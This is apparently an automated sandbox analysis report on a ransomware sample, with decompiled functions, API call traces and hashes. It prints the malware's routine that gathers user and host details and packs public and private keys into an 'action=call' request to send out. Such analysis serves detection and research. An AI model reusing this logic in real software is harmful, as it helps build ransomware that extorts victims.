													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x97850fe0
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

0x0f1433e3
0x0f1433e5
0x0f1433e9
0x0f1433eb
0x0f1433ee
0x0f1433f1
0x0f1433f8
0x0f1434db
0x0f1434db
0x0f143410
0x0f143425
0x0f14342b
0x0f14342f
0x00000000
0x0f143431
0x0f143432
0x0f143434
0x0f14343a
0x0f143441
0x0f143444
0x0f14344a
0x0f14344b
0x0f1434ba
0x0f14344d
0x0f14344e
0x0f143450
0x0f143452
0x0f143456
0x0f143467
0x0f143467
0x0f14346b
0x0f14346d
0x0f143471
0x0f143473
0x0f143478
0x0f14347c
0x00000000
0x00000000
0x0f14347e
0x00000000
0x0f14347c
0x0f143480
0x0f143480
0x0f143483
0x0f143484
0x0f143495
0x0f14349e
0x0f1434a3
0x0f1434a7
0x0f1434a7
0x0f1434ad
0x0f1434b0
0x0f1434b0
0x00000000
0x0f143458
0x0f14345c
0x0f14345f
0x00000000
0x0f143461
0x0f143461
0x0f143465
0x00000000
0x00000000
0x00000000
0x00000000
0x0f143465
0x00000000
0x0f14345f
0x0f143458
0x0f143456
0x0f14344e
0x0f14344b
0x0f143444
0x0f1434bf
0x0f1434bf
0x0f1434bf
0x0f1434c2
0x0f1434c3
0x0f1434d6
0x0f1434d6
0x0f143412
0x0f143412
0x0f143418
0x0f143422
0x0f143422

APIs

Part of subcall function 0F1432B0: lstrlenA.KERNEL32(?,00000000,?,0F145444,?,?,0F1433F6,00000000,00000000,?,?,0F145444,00000000), ref: 0F1432C5
Part of subcall function 0F1432B0: lstrlenA.KERNEL32(?,?,0F1433F6,00000000,00000000,?,?,0F145444,00000000,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F1432EE

lstrlenA.KERNEL32(0F145445,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F143484
GetProcessHeap.KERNEL32(00000008,00000001,?,0F145444,00000000,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F14348E
HeapAlloc.KERNEL32(00000000,?,0F145444,00000000,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F143495
lstrcpyA.KERNEL32(00000000,0F145445,?,0F145444,00000000,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F1434A7
ExitProcess.KERNEL32 ref: 0F1434DB

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: 08d0246bca1a98df9eabde7681cfebc1c311a4017b618f09a4685b8a549ebd2f
Instruction ID: d878f92fbd67dedab6cfd3d46ab79be65ad32f7df60283aacbf70f2e51142f02
Opcode Fuzzy Hash: 08d0246bca1a98df9eabde7681cfebc1c311a4017b618f09a4685b8a549ebd2f
Instruction Fuzzy Hash: D23127345042455AEB2A4F6884447F57B949FD2310F9C4189E8F9CB283D77DB8A7E770

Uniqueness

Uniqueness Score: -1.00%

Function 0F143CF0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0F143D42
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F143D66
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F143D6A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F143D6E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F143D95

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: cef83f25be2d9a09c498833550395443b3b24b34a6e4776d6810446f0891ba8e
Instruction ID: 82098c17eff53694ce3f2df1db8eae3fe980248b354be43f86311e0f367ba0f4
Opcode Fuzzy Hash: cef83f25be2d9a09c498833550395443b3b24b34a6e4776d6810446f0891ba8e
Instruction Fuzzy Hash: F0110CB0D4031C6EEB609F64DC0ABEA7ABCEF48710F008199A508E61C1D6B95B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0F144EA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F144EA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xf14faac]");
				_t16 =  *0xf14fab4; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

0x0f144ea6
0x0f144eae
0x0f144eb4
0x0f144eb9
0x0f144ebc
0x0f144ec1
0x0f144ec6
0x0f144ec9
0x0f144f1a
0x0f144f1c
0x00000000
0x0f144f1e
0x0f144f22
0x0f144f5f
0x0f144f61
0x00000000
0x0f144f63
0x0f144f6d
0x0f144f70
0x0f144f70
0x0f144f74
0x00000000
0x00000000
0x0f144f7a
0x0f144f7a
0x0f144f7d
0x0f144f80
0x0f144f80
0x0f144f84
0x00000000
0x00000000
0x0f144f8e
0x0f144f8e
0x00000000
0x0f144f8a
0x0f144f8c
0x00000000
0x00000000
0x0f144f95
0x0f144fa4
0x00000000
0x0f144fa4
0x0f144f80
0x0f144f24
0x0f144f24
0x0f144f28
0x0f144f2f
0x0f144f31
0x0f144f31
0x0f144f36
0x0f144f4f
0x0f144f52
0x00000000
0x00000000
0x00000000
0x00000000
0x0f144f38
0x0f144f38
0x0f144f38
0x0f144f3c
0x00000000
0x00000000
0x0f144f45
0x0f144f47
0x00000000
0x0f144f49
0x0f144f49
0x0f144f4d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f144f4d
0x00000000
0x0f144f47
0x00000000
0x0f144f38
0x00000000
0x0f144f54
0x0f144f54
0x0f144f57
0x0f144f58
0x0f144f59
0x0f144f5d
0x00000000
0x0f144f28
0x0f144f22
0x0f144ecb
0x0f144ecb
0x0f144ecf
0x0f144f05
0x0f144f19
0x0f144ed1
0x0f144ed3
0x0f144ed5
0x0f144ed5
0x0f144ed9
0x0f144ef7
0x0f144efa
0x00000000
0x00000000
0x00000000
0x00000000
0x0f144edb
0x0f144ee0
0x0f144ee0
0x0f144ee4
0x00000000
0x00000000
0x0f144eed
0x0f144eef
0x00000000
0x0f144ef1
0x0f144ef1
0x0f144ef5
0x00000000
0x00000000
0x00000000
0x00000000
0x0f144ef5
0x00000000
0x0f144eef
0x00000000
0x0f144ee0
0x00000000
0x0f144efc
0x0f144efc
0x0f144eff
0x0f144f00
0x0f144f01
0x00000000
0x0f144ed5
0x0f144ecf
0x00000000

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F1451ED), ref: 0F144F0D
lstrlenA.KERNEL32(00000000,?,0F1451ED), ref: 0F144F67
lstrcpyA.KERNEL32(?,?,?,0F1451ED), ref: 0F144F98

Strings

fabian wosar <3, xrefs: 0F144F05

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: 7882f95dc58192e3a105e3e578b23929e8a0c6c37ac4d9d5ebfef406dafa9c20
Instruction ID: 75fca1ffd318632a12a80cc0a6c5f3588b8be3397f865febbe25b52c8b57149e
Opcode Fuzzy Hash: 7882f95dc58192e3a105e3e578b23929e8a0c6c37ac4d9d5ebfef406dafa9c20
Instruction Fuzzy Hash: A33176258081A95ADB3ACE3C44103FABFA2AFC3102FA912C9DCD59B287C3217476C390

Uniqueness

Uniqueness Score: -1.00%

Function 0F143190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F143190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

0x0f143193
0x0f143197
0x0f14319c
0x0f1431b0
0x0f1431b9
0x0f1431ce
0x0f1431d1
0x0f1431d9
0x0f1431e1
0x0f1431e4
0x0f1431e9
0x0f1431a0
0x0f1431a0
0x0f1431a0
0x0f1431a4
0x00000000
0x00000000
0x0f1431a8
0x0f1431ec
0x00000000
0x0f1431aa
0x0f1431aa
0x0f1431ae
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1431ae
0x00000000
0x0f1431a8
0x0f1431f5
0x0f1431f5
0x00000000

APIs

lstrcmpiA.KERNEL32(0F145444,mask,0F145445,?,?,0F143441,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F1431B9
lstrcmpiA.KERNEL32(0F145444,pub_key,?,0F143441,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F1431D1

Strings

pub_key, xrefs: 0F1431BF
mask, xrefs: 0F1431B1

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: df7ba3fee0283b8c850d518a5f1f93d0f21e9ace0ac05fd03437990a0db5a305
Instruction ID: bbc218eade748cdeafd7f4348079e32239d5aa6d1c56e4edca4e4f6a1e159fdd
Opcode Fuzzy Hash: df7ba3fee0283b8c850d518a5f1f93d0f21e9ace0ac05fd03437990a0db5a305
Instruction Fuzzy Hash: 6DF046723483881EE7194EA89C45BA1BBC89BC1711F84007EE689C3242C3AAB8A29750

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mqsmvj.exePID: 4652, Parent PID: 3320COMMON

Execution Graph

Execution Coverage:	20.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	713
Total number of Limit Nodes:	13

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0F585860 Relevance: 109.0, APIs: 55, Strings: 7, Instructions: 458
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0F585860(CHAR* __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v148;
				char _v152;
				void* _v156;
				int _v160;
				int _v164;
				CHAR* _v172;
				int _v176;
				CHAR* _v184;
				int _v192;
				void* _v196;
				CHAR* _v200;
				CHAR* _v204;
				WCHAR* _v208;
				void* _v212;
				void* _v216;
				signed int _v220;
				short* _v224;
				void* _v228;
				void* _v232;
				void* _v236;
				CHAR* _v240;
				CHAR* _v268;
				void* __esi;
				CHAR* _t134;
				void* _t136;
				int _t146;
				void* _t149;
				int _t150;
				signed int _t151;
				void* _t153;
				int _t159;
				signed int _t167;
				signed int _t171;
				CHAR* _t178;
				int _t179;
				CHAR* _t182;
				void* _t191;
				long _t195;
				void _t210;
				int _t211;
				intOrPtr _t215;
				int _t216;
				char _t217;
				long _t226;
				int _t239;
				char* _t240;
				void* _t244;
				void* _t245;
				void* _t248;
				long _t250;
				signed int _t254;
				CHAR* _t256;
				int _t259;
				int _t260;
				void* _t261;
				void* _t266;
				CHAR* _t267;
				void* _t270;
				CHAR* _t273;
				long _t276;
				CHAR* _t277;
				char* _t279;
				signed int _t282;
				int _t283;
				long _t286;
				void* _t287;
				void* _t288;
				WCHAR* _t289;
				WCHAR* _t290;
				void* _t291;
				WCHAR* _t292;
				WCHAR* _t294;
				int _t297;
				long _t298;
				void* _t299;
				CHAR* _t300;
				int _t302;
				signed int _t303;
				void* _t307;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v184 = __ecx;
				_v160 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_t307 = (_t303 & 0xfffffff8) - 0x9c;
				_push(1);
				_push(__ecx);
				_push(1);
				E0F583BC0( &_v148);
				E0F587490( &_v236, __edx); // executed
				_t266 = E0F5872A0( &_v236);
				_t282 = _a8 + __edx;
				_t7 = _t282 + 8; // 0x8
				_t226 = _t266 + _t7 * 8 << 3;
				_t134 = VirtualAlloc(0, _t226, 0x3000, 0x40); // executed
				_t259 = 0;
				_v240 = _t134;
				_v268 = _t134;
				_t239 = 0x30 + (_t266 + _t282 * 4) * 8;
				if(_t134 == 0 || _t239 >= _t226) {
					_v176 = _t259;
					_t267 = _t134;
				} else {
					_t267 = _t239 + _t134;
					_v176 = _t134;
					_v184 = _t267;
					_t259 = _t239;
				}
				_t136 = 2 + _a8 * 8;
				if(_v156 == 0) {
					L7:
					_t240 = 0;
					_v172 = 0;
				} else {
					_t302 = _t259 + _t136;
					if(_t302 >= _t226) {
						goto L7;
					} else {
						_t240 = _t267;
						_v172 = _t267;
						_t267 =  &(_t267[_t136]);
						_t259 = _t302;
						_v184 = _t267;
					}
				}
				_t283 = _v164;
				if(_v156 == 0 || 2 + _t283 * 8 + _t259 >= _t226) {
					_t267 = 0;
					_v184 = 0;
				}
				if(_t240 == 0) {
					L58:
					VirtualFree(_v156, 0, 0x8000);
					E0F587D70( &_v152);
					return 1;
				} else {
					_t260 = _a8;
					_v160 = _t260 + _t260;
					CryptBinaryToStringA(_a4, _t260, 0x40000001, _t240,  &_v160);
					_v176 = _t283 + _t283;
					CryptBinaryToStringA(_v204, _t283, 0x40000001, _t267,  &_v176);
					_t146 = lstrlenA(_t267);
					_t286 = _t146 + lstrlenA(_v204) + 0x42;
					_t149 = VirtualAlloc(0, _t286, 0x3000, 0x40); // executed
					_v196 = _t149;
					_v200 = _t149;
					_v220 = 0;
					_t150 = lstrlenA(_v204);
					_t261 = _v196;
					_t151 = _t150 + 1;
					if(_t261 == 0 || _t151 >= _t286) {
						_v212 = 0;
					} else {
						_v220 = _t151;
						_v200 = _t261 + _t151;
						_v212 = _t261;
					}
					_t153 = lstrlenA(_t267) + 1;
					if(_v196 == 0 || _t153 + _v220 >= _t286) {
						_v200 = 0;
					}
					_t287 = 0;
					if(lstrlenA(_v204) != 0) {
						_t279 = _v212;
						do {
							_t256 = _v204;
							_t217 =  *((intOrPtr*)(_t287 + _t256));
							if(_t217 != 0xa && _t217 != 0xd) {
								 *_t279 = _t217;
								_t279 = _t279 + 1;
							}
							_t287 = _t287 + 1;
						} while (_t287 < lstrlenA(_t256));
						_t267 = _v216;
					}
					_t288 = 0;
					if(lstrlenA(_t267) != 0) {
						_t254 = _v200;
						_v220 = _t254;
						do {
							_t215 =  *((intOrPtr*)(_t288 + _t267));
							if(_t215 != 0xa && _t215 != 0xd) {
								 *_t254 = _t215;
								_v220 = _t254 + 1;
							}
							_t288 = _t288 + 1;
							_t216 = lstrlenA(_t267);
							_t254 = _v220;
						} while (_t288 < _t216);
					}
					_t289 = _v208;
					lstrcatW(_t289, L"action=call&");
					_t290 =  &(_t289[lstrlenW(_t289)]);
					_v216 = _t290;
					E0F5870A0( &_v184, _t290); // executed
					_v224 = 0;
					_v208 = 0;
					_t159 = E0F5835C0( &_v224,  &_v208); // executed
					if(_t159 == 0) {
						ExitProcess(_t159); // executed
					}
					lstrcatW(_t290, L"&id=");
					_t270 = _v220;
					lstrcatW(_t290, _t270);
					lstrcatW(_t290, L"&subid=");
					_t291 = _v204;
					lstrcatW(_v216, _t291);
					VirtualFree(_t270, 0, 0x8000);
					VirtualFree(_t291, 0, 0x8000);
					_t292 = _v216;
					lstrcatW(_t292, L"&pub_key=");
					_t167 = lstrlenW(_t292);
					MultiByteToWideChar(0xfde9, 0, _v212, 0xffffffff,  &(_t292[_t167]), lstrlenA(_v212));
					_t294 = _v216;
					lstrcatW(_t294, L"&priv_key=");
					_t171 = lstrlenW(_t294);
					_t273 = _v200;
					MultiByteToWideChar(0xfde9, 0, _t273, 0xffffffff,  &(_t294[_t171]), lstrlenA(_t273));
					lstrcatW(_v216, L"&version=2.3.1r");
					_t276 = (lstrlenW(_v208) << 4) + 0x12;
					_v216 = VirtualAlloc(0, _t276, 0x3000, 0x40);
					_t244 = 2 + lstrlenW(_v208) * 8;
					_t178 = _v216;
					if(_t178 == 0 || _t244 >= _t276) {
						_t277 = 0;
					} else {
						_t277 = _t178;
					}
					_t179 = lstrlenW(_v208);
					_t245 =  *0xf592a78; // 0x0
					_v220 = _t179;
					if(_t245 != 0) {
						VirtualFree(_t245, 0, 0x8000);
					}
					_t182 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
					 *0xf592a78 = _t182;
					if(_t182 != 0) {
						wsprintfA(_t182, "%S", L"popkadurak");
						_t307 = _t307 + 0xc;
					}
					_t297 = _v220 + _v220;
					E0F585F00(_v208, _t297, _t297);
					_v192 = _v220 * 8;
					if(CryptBinaryToStringA(_v208, _t297, 0x40000001, _t277,  &_v192) == 0) {
						GetLastError();
					}
					_t104 = lstrlenA(_t277) + 2; // 0x2
					_t298 = _t104;
					_v228 = VirtualAlloc(0, _t298, 0x3000, 0x40);
					_t106 = lstrlenA(_t277) + 1; // 0x1
					_t248 = _t106;
					_t191 = _v228;
					if(_t191 == 0) {
						L46:
						_v216 = 0;
					} else {
						_v216 = _t191;
						if(_t248 >= _t298) {
							goto L46;
						}
					}
					_t299 = 0;
					if(lstrlenA(_t277) != 0) {
						_v236 = _v216;
						do {
							_t210 =  *((intOrPtr*)(_t299 + _t277));
							if(_t210 != 0xa && _t210 != 0xd) {
								 *_t248 = _t210;
								_v236 = _t248 + 1;
							}
							_t299 = _t299 + 1;
							_t211 = lstrlenA(_t277);
							_t248 = _v236;
						} while (_t299 < _t211);
					}
					_t300 = _v216;
					MultiByteToWideChar(0xfde9, 0, _t300, 0xffffffff, _v224, lstrlenA(_t300));
					_v236 = 0;
					_t195 = E0F5854F0(_t300,  &_v236, _t248, 1);
					if(_t195 != 0) {
						_t250 = _v236;
						if(_t250 != 0) {
							 *_a12 = _t250;
						}
						VirtualFree(_v228, 0, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						goto L58;
					} else {
						VirtualFree(_v228, _t195, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						VirtualFree(_v204, 0, 0x8000);
						E0F587D70( &_v200);
						return 0;
					}
				}
			}

0x0f58586f
0x0f585870
0x0f585872
0x0f585873
0x0f585878
0x0f58587e
0x0f585882
0x0f585884
0x0f585885
0x0f585887
0x0f585888
0x0f58588a
0x0f58588b
0x0f58588d
0x0f58588e
0x0f585890
0x0f585893
0x0f585895
0x0f585896
0x0f58589f
0x0f5858a8
0x0f5858b9
0x0f5858bb
0x0f5858c4
0x0f5858ca
0x0f5858d0
0x0f5858d6
0x0f5858d8
0x0f5858dc
0x0f5858e3
0x0f5858ec
0x0f585901
0x0f585905
0x0f5858f2
0x0f5858f2
0x0f5858f5
0x0f5858f9
0x0f5858fd
0x0f5858fd
0x0f58590f
0x0f585916
0x0f58592f
0x0f58592f
0x0f585931
0x0f585918
0x0f585918
0x0f58591d
0x00000000
0x0f58591f
0x0f58591f
0x0f585921
0x0f585925
0x0f585927
0x0f585929
0x0f585929
0x0f58591d
0x0f58593a
0x0f58593e
0x0f58594d
0x0f58594f
0x0f58594f
0x0f58595b
0x0f585d98
0x0f585da3
0x0f585da9
0x0f585db9
0x0f585961
0x0f585961
0x0f58596d
0x0f585980
0x0f585985
0x0f585999
0x0f5859a2
0x0f5859b6
0x0f5859bb
0x0f5859c5
0x0f5859c9
0x0f5859cd
0x0f5859d5
0x0f5859d7
0x0f5859db
0x0f5859de
0x0f5859f5
0x0f5859e4
0x0f5859e7
0x0f5859eb
0x0f5859ef
0x0f5859ef
0x0f585a00
0x0f585a06
0x0f585a10
0x0f585a10
0x0f585a1c
0x0f585a22
0x0f585a24
0x0f585a30
0x0f585a30
0x0f585a34
0x0f585a39
0x0f585a3f
0x0f585a41
0x0f585a41
0x0f585a43
0x0f585a46
0x0f585a4a
0x0f585a4a
0x0f585a4f
0x0f585a55
0x0f585a57
0x0f585a5b
0x0f585a60
0x0f585a60
0x0f585a65
0x0f585a6b
0x0f585a6e
0x0f585a6e
0x0f585a73
0x0f585a74
0x0f585a76
0x0f585a7a
0x0f585a60
0x0f585a7e
0x0f585a8e
0x0f585a9b
0x0f585a9f
0x0f585aa3
0x0f585aac
0x0f585ab8
0x0f585ac0
0x0f585ac7
0x0f585aca
0x0f585aca
0x0f585ad6
0x0f585ad8
0x0f585ade
0x0f585aea
0x0f585af0
0x0f585af9
0x0f585b0d
0x0f585b17
0x0f585b19
0x0f585b23
0x0f585b30
0x0f585b4a
0x0f585b50
0x0f585b5a
0x0f585b61
0x0f585b63
0x0f585b79
0x0f585b88
0x0f585ba6
0x0f585bb6
0x0f585bbc
0x0f585bc3
0x0f585bc9
0x0f585bd3
0x0f585bcf
0x0f585bcf
0x0f585bcf
0x0f585bd9
0x0f585bdb
0x0f585be1
0x0f585be7
0x0f585bf1
0x0f585bf1
0x0f585c0b
0x0f585c11
0x0f585c18
0x0f585c25
0x0f585c2b
0x0f585c2b
0x0f585c36
0x0f585c3b
0x0f585c4b
0x0f585c67
0x0f585c69
0x0f585c69
0x0f585c79
0x0f585c79
0x0f585c86
0x0f585c8c
0x0f585c8c
0x0f585c8f
0x0f585c95
0x0f585c9f
0x0f585c9f
0x0f585c97
0x0f585c97
0x0f585c9d
0x00000000
0x00000000
0x0f585c9d
0x0f585ca8
0x0f585cae
0x0f585cb4
0x0f585cb8
0x0f585cb8
0x0f585cbd
0x0f585cc3
0x0f585cc6
0x0f585cc6
0x0f585ccb
0x0f585ccc
0x0f585cce
0x0f585cd2
0x0f585cb8
0x0f585cd6
0x0f585cec
0x0f585cf9
0x0f585d03
0x0f585d0d
0x0f585d5c
0x0f585d62
0x0f585d67
0x0f585d67
0x0f585d7b
0x0f585d89
0x0f585d96
0x00000000
0x0f585d0f
0x0f585d20
0x0f585d2e
0x0f585d3b
0x0f585d48
0x0f585d4e
0x0f585d5b
0x0f585d5b
0x0f585d0d

APIs

Part of subcall function 0F583BC0: GetProcessHeap.KERNEL32(?,?,0F584807,00000000,?,00000000,00000000), ref: 0F583C5C

Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F5874B7
Part of subcall function 0F587490: GetUserNameW.ADVAPI32 ref: 0F5874C8
Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F5874E6
Part of subcall function 0F587490: GetComputerNameW.KERNEL32 ref: 0F5874F0
Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F587510
Part of subcall function 0F587490: wsprintfW.USER32 ref: 0F587551
Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F58756E
Part of subcall function 0F587490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
Part of subcall function 0F587490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
Part of subcall function 0F587490: RegCloseKey.KERNEL32(00000000), ref: 0F5875D2

Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
